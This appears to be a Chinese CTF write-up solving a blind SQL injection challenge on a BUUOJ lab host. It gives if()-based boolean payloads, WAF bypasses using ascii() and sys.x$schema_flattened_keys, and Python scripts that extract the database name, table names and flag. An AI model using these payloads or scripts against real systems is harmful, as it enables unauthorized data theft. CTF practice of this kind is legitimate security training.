id=1时提示:

Nu1L

id=2时提示:

V&N

id=0(不存在)时提示:

Error Occured When Fetch Result.

触发WAF时提示:

SQL Injection Checked.

输入if(0,1,2),因为0是false,所以等同id=2,输出V&N

输入if(1,1,2),因为1是true,所以等同id=1,输出Nu1L

判断当前数据库名长度,等于21时返回Nu1L,证明语句为真:

if((length(database()))=21,1,2)

“if(ord”这个组合拳被过滤掉了,把ord()改为ascii()就好:

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,22):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += chr(j)
            print(name)
            break

得到库名为give_grandpa_pa_pa_pa。继续爆表名,information_schema被过滤了,查了下资料,可以用sys.x$schema_flattened_keys代替

判断表名长度,等于39时返回Nu1L,证明语句为真:

if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)

爆表:

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,40):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += chr(j)
            print(name)
            break

得到两个表名:f1ag_1s_h3r3_hhhhh,users233333333333333

正常应该爆列名,因为information_schema被过滤懒得搞直接猜测flag在flag列里了。。稍微改了下长度,为了快点换成了小字典。

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1,50):
    for j in dic:
        payload = payload1+str(i)+payload2+str(ord(j))+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += j
            print(name)
            break